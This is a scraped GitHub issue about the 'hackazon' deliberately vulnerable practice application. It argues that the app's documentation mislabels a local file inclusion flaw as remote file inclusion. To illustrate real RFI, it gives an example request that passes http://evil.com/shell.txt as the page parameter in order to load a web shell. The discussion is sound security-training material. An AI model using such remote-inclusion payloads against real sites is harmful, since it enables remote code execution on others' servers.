You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on May 18, 2021. It is now read-only.
RFI Injection allows to use an app logic where the app includes some file based on user input. In our app it's implemented in the Help Articles section:
This is pulling a local file, and the vuln present is LFI not RFI.
RFI would be using the script to pull in external content like a flash plugin or a text file from an external server that then gets parsed and included in-line to exploit either the user or the system. Like so:
In your practise application you have misclassified LFI as RFI.
on https://github.com/rapid7/hackazon/blob/master/VULNERABILITIES.md
you say:
Remote File Include:
This is pulling a local file, and the vuln present is LFI not RFI.
RFI would be using the script to pull in external content like a flash plugin or a text file from an external server that then gets parsed and included in-line to exploit either the user or the system. Like so:
http://hackazon.dev/account/help_articles?page=http://evil.com/shell.txt
the value of which would be a web shell like so:
The text was updated successfully, but these errors were encountered: